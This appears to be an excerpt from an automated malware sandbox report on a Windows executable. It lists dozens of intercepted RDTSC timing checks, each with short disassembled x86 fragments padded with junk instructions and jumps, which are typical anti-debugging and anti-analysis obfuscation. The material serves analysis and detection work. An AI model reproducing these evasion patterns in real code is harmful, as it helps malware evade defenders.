                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4624 second address: 8D4628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4628 second address: 8D464C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503873h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F848150386Bh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D464C second address: 8D4656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4783 second address: 8D4787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4787 second address: 8D478B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4B7E second address: 8D4B83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4B83 second address: 8D4B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4B89 second address: 8D4BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jnl 00007F8481503866h 0x0000000f pop ebx 0x00000010 jmp 00007F8481503877h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F848150386Bh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4CFD second address: 8D4D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4D03 second address: 8D4D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D4D09 second address: 8D4D13 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F848074392Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8BCF second address: 8C8BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5563 second address: 8D556E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5B55 second address: 8D5B8A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8481503866h 0x00000008 jmp 00007F8481503873h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503874h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5B8A second address: 8D5B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5B8E second address: 8D5B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA115 second address: 8DA11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAF6F second address: 8DAF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC8E5 second address: 8DC8F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC8F3 second address: 8DC8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8481503866h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1203 second address: 8E1207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1207 second address: 8E1210 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1210 second address: 8E121E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E121E second address: 8E1222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1222 second address: 8E1228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1228 second address: 8E1247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8481503879h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1247 second address: 8E1253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1968 second address: 8E1993 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8481503866h 0x00000008 jnc 00007F8481503866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F8481503878h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1993 second address: 8E1999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1ADC second address: 8E1AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Bh 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3D73 second address: 8E3D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3D7A second address: 8E3D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3D87 second address: 8E3D9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3D9B second address: 8E3DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3DA2 second address: 8E3DC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F8480743926h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 jmp 00007F848074392Ch 0x00000016 pop edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E42A2 second address: 8E42C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F8481503873h 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E4B9B second address: 8E4B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E4B9F second address: 8E4BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E4C86 second address: 8E4CA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnl 00007F8480743926h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E4CA4 second address: 8E4CA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E561D second address: 8E563E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8480743935h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E80CC second address: 8E80D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8705 second address: 8E8709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E91B2 second address: 8E91CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8481503871h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E9C68 second address: 8E9C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA72D second address: 8EA731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EBC6D second address: 8EBC77 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED745 second address: 8ED74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC4CA second address: 8EC4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED8BC second address: 8ED8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8481503866h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE6A8 second address: 8EE6AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF65C second address: 8EF660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE7EB second address: 8EE800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF660 second address: 8EF669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF669 second address: 8EF66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF66F second address: 8EF6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F8481503868h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D2A4Ch], eax 0x00000027 push 00000000h 0x00000029 or dword ptr [ebp+122D3560h], eax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F8481503868h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b jmp 00007F848150386Ch 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jbe 00007F8481503868h 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF6DD second address: 8EF6E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF862 second address: 8EF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F848150386Ah 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F07F7 second address: 8F07FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F1627 second address: 8F162D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F162D second address: 8F1631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F26BC second address: 8F26DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F848150386Dh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jo 00007F8481503866h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F26DC second address: 8F26E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4808 second address: 8F480C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6915 second address: 8F6919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6919 second address: 8F6923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6923 second address: 8F6927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6927 second address: 8F692D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F692D second address: 8F6977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F8480743936h 0x00000011 jmp 00007F848074392Eh 0x00000016 pop edx 0x00000017 jmp 00007F848074392Eh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB066 second address: 8AB07B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6FC5 second address: 8F7021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F8480743926h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F8480743936h 0x00000014 nop 0x00000015 mov edi, esi 0x00000017 push 00000000h 0x00000019 mov edi, dword ptr [ebp+122D1E69h] 0x0000001f jmp 00007F8480743937h 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+122D3630h] 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e je 00007F8480743928h 0x00000034 push esi 0x00000035 pop esi 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7021 second address: 8F702E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop eax 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8F2F second address: 8F8F4C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F848074392Eh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FADA5 second address: 8FADA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FADA9 second address: 8FADB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F848074392Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FADB7 second address: 8FAE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F8481503868h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000018h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F8481503868h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D19FDh], ebx 0x00000042 push 00000000h 0x00000044 xor dword ptr [ebp+122D26B0h], ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 jmp 00007F8481503876h 0x00000055 popad 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F815B second address: 8F81D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F848074392Fh 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F848074392Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F8480743928h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push dword ptr fs:[00000000h] 0x0000003a adc ebx, 6B697BA1h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov dword ptr [ebp+122D1EF2h], ebx 0x0000004d mov eax, dword ptr [ebp+122D156Dh] 0x00000053 mov edi, dword ptr [ebp+122D1BD2h] 0x00000059 push FFFFFFFFh 0x0000005b jmp 00007F848074392Dh 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push edx 0x00000065 pop edx 0x00000066 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA004 second address: 8FA008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FAF86 second address: 8FAF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FAF8B second address: 8FAF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FCD7C second address: 8FCD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FCD85 second address: 8FCD89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FCD89 second address: 8FCE12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8480743928h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, edx 0x00000029 push 00000000h 0x0000002b mov edi, eax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F8480743928h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 sub ebx, dword ptr [ebp+122D382Ch] 0x0000004f jg 00007F848074392Dh 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F848074392Ah 0x0000005d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FAF90 second address: 8FB029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jmp 00007F848150386Eh 0x00000013 pop eax 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D1EE1h], ebx 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov dword ptr [ebp+12466B3Eh], eax 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F8481503868h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 sbb bx, 36FEh 0x0000004e mov eax, dword ptr [ebp+122D0199h] 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007F8481503868h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 0000001Bh 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e push FFFFFFFFh 0x00000070 and edi, 0708B497h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB029 second address: 8FB02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB02D second address: 8FB033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
